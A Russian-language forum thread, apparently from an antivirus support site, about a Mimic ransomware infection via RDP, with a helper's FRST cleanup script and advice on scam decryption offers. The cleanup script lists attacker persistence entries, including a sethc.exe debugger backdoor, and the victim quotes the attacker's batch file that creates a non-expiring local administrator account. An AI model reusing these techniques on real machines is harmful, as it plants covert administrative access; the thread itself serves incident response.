Перейти к содержанию

Рекомендуемые сообщения

Добрый день!

Поймали шифровальщика. Прошу помощи. 

Предположительно, взлом был осуществлен через RDP. Полегла вся инфраструктура.

 

Archive.zipFRST.txt

Addition.txt

Ссылка на сообщение
Поделиться на другие сайты

По очистке системы:

 

Выполните скрипт очистки в FRST

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт автоматически очистит систему, и завершит работу без перезагрузки

 

Start::
HKLM\...\Run: [svhostss.exe] => notepad.exe "C:\Users\NoName\AppData\Local\Decryption_INFO.txt" (Нет файла)
HKLM\...\Policies\system: [legalnoticetext] Hello my dear friend (Do not scan the files with antivirus in any case. In case of data loss, the consequences
IFEO\CompatTelRunner.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\logoff.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\perfmon.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\SearchApp.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\SearchIndexer.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\SearchProtocolHost.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\sethc.exe: [Debugger] c:\windows\system32\cmd.exe
IFEO\shutdown.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\taskkill.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\tasklist.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\taskmgr.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\wsqmcons.exe: [Debugger] C:\Windows\System32\Systray.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk [2020-04-20]
ShortcutTarget: AnyDesk.lnk -> C:\Program Files (x86)\AnyDesk\AnyDesk.exe (Нет файла)
GroupPolicy: Ограничение - Chrome <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
Task: {1D088239-875A-405A-B745-78C1D3E6B266} - \Apple\AppleSoftwareUpdate -> Нет файла <==== ВНИМАНИЕ
Task: {3AE5B73F-DFBB-4D64-84CF-BD12BEA09CA7} - \rep -> Нет файла <==== ВНИМАНИЕ
Task: {4ED79AAE-FD1E-4960-A86D-B9F79EB307EA} - \sm1 -> Нет файла <==== ВНИМАНИЕ
Task: {7AC40101-6609-494F-9451-A58D214D8D13} - \curl -> Нет файла <==== ВНИМАНИЕ
Task: {7C9C5F33-157D-4E5D-9881-16BED684B3E4} - \curls -> Нет файла <==== ВНИМАНИЕ
Task: {B15A2FE3-5E8F-48AD-AEBF-60881B47D989} - \MSI -> Нет файла <==== ВНИМАНИЕ
2024-06-09 17:50 - 2024-06-10 00:17 - 000000935 _____ C:\Decryption_INFO.txt
2024-06-09 17:18 - 2024-06-09 20:26 - 000000000 ____D C:\Program Files\Process Hacker 2
2024-06-09 17:18 - 2024-06-09 17:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Process Hacker 2
2024-06-09 15:46 - 2024-06-09 15:46 - 000000428 _____ C:\Windows\system32\u2.bat
End::

 

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение.

Папку C:\FRST\Quarantine добавьте в архив с паролем virus, архив загрузите на облачный диск и дайте ссылку на скачивание архива в ЛС.

 

 

К сожалению, расшифровка файлов по данному типу шифровальщика невозможна без приватного ключа.

 

По Mimic Ransomware, который активен в течение более 1,5 лет, к сожалению, нет в настоящее время расшифровки файлов без приватного ключа. Злоумышленники, стоящие за Mimic используют утекший в сеть билдер Conti чтобы извлечь выгоду из его различных функций и даже улучшить код для более эффективных атак.

-----------

Будьте внимательны,

в ЛС, (после создания темы), к вам могут обратиться с предложением о помощи в расшифровке.

Если предлагают готовое решение с вашим приватным ключом - тогда это злоумышленники (ключ хранится у них),

если предлагают решение: расшифровать бесплатно несколько ваших файлов, как доказательство своих возможностей - и они это смогут сделать, запросив бесплатную расшифровку у злоумышленников, а остальные файлы - за выкуп вашего дешифратора/ключа за ваши деньги, то это могут быть посредники,

здесь основной риск - после получения оплаты посредники просто исчезают из чата или контакта,

если после получения вашей оплаты за дешифратор с ключом посредники исчезают из контакта, то это, увы, были мошенники.

+

проверьте ЛС.

Ссылка на сообщение
Поделиться на другие сайты

NoName - сторонняя или служебная учетная запись? пакеты с Python к Mimic, скорее всего не имеют отношения. Кто-то развернул Python, добавил криптобиблиотеки, возможно другие инструменты. С какой целью? возможно для изучения. Надо смотреть по датам развертывания. Злоумышленники с шифрованием приходят уже с готовым установщиком для Mimic.

Ссылка на сообщение
Поделиться на другие сайты
  • 2 часа назад, safety сказал:

    NoName - сторонняя или служебная учетная запись? пакеты с Python к Mimic, скорее всего не имеют отношения. Кто-то развернул Python, добавил криптобиблиотеки, возможно другие инструменты. С какой целью? возможно для изучения. Надо смотреть по датам развертывания. Злоумышленники с шифрованием приходят уже с готовым установщиком для Mimic.

    Сторонняя. Была создана злоумышленниками.

Ссылка на сообщение
Поделиться на другие сайты
40 минут назад, safety сказал:

А что в этом файле?

2024-06-09 15:46 - 2024-06-09 15:46 - 000000428 _____ C:\Windows\system32\u2.bat

С помощью этого батника был создан пользователь NoName

 

@echo off
echo ---------
color 0f
set  user=NoName
set  pass=ntpe9gNjIH
set AdmGroupSID=S-1-5-32-544
set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do set AdmGroup=%%J
set AdmGroup=%AdmGroup:~0,-1%
net user %user% %pass% /add /Passwordchg:Yes
net localgroup %AdmGroup% %user% /add
WMIC useraccount where name='%user%' set passwordexpires=false
 

Сравнил файлы "записок" с контактами, на каждой машине присвоен у них разный ID, т.е. еще и ключи для расшифровки на каждой будут разные.

Изменено пользователем Ezh85
Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • Николай Щипунов
      От Николай Щипунов
      Добрый день!
       
      Компьютер пользователя атакован вирусом-шифровальщиком. Предположительный канал проникновения - доступ к удаленному рабочему столу через протокол RDP.
      Образцы файлов и записка вымогателей находятся в файле samples.zip. Незашифрованные версии файлов имеются и могут быть предоставлены по запросу.
      Сам файл шифровальщика найден и может быть предоставлен дополнительно по запросу.
       
      Операционная система  была переустановлена. Farbar Recovery Scan Tool запускалась в чистой среде.
      samples.zip Addition.txt FRST.txt
    • Сергей_00
      От Сергей_00
      Добрый день!
      Сегодня шифровальщик зашифровал большую часть нужных файлов, благо выключили компьютер из розетки...
      В результате остались файлы в папке запуска подозрительного файла   svhostss.exe, а именно в папке c:\users\пользователь\BD3FDDDF-6CAF-3EBC-D9CF-C8DF72D8F78A\svhostss.exe
      следующие файлы:
      Everything.db
      Everything32.dll
      Everything64.dll
      session.tmp
      svhostss.exe
       
      быть может есть возможность дешифровать данные? 
    • Max78
      От Max78
      Здравствуйте, вирус зашифровал файлы на компьютере, все файлы переименовал *.ELPACO-team
      Прошу помощи
    • forse86
      От forse86
      Здравствуйте. Вирус зашифровал файлы и поменял название файлов на *.TELEGRAM
      Прошу помощи. 
      Addition.txt FRST.txt Вирус.rar
    • AntonK2402
      От AntonK2402
      Зашифровались все файлы  расширение WORM  
       
      как можно расшифровать ? 
×
×
  • Создать...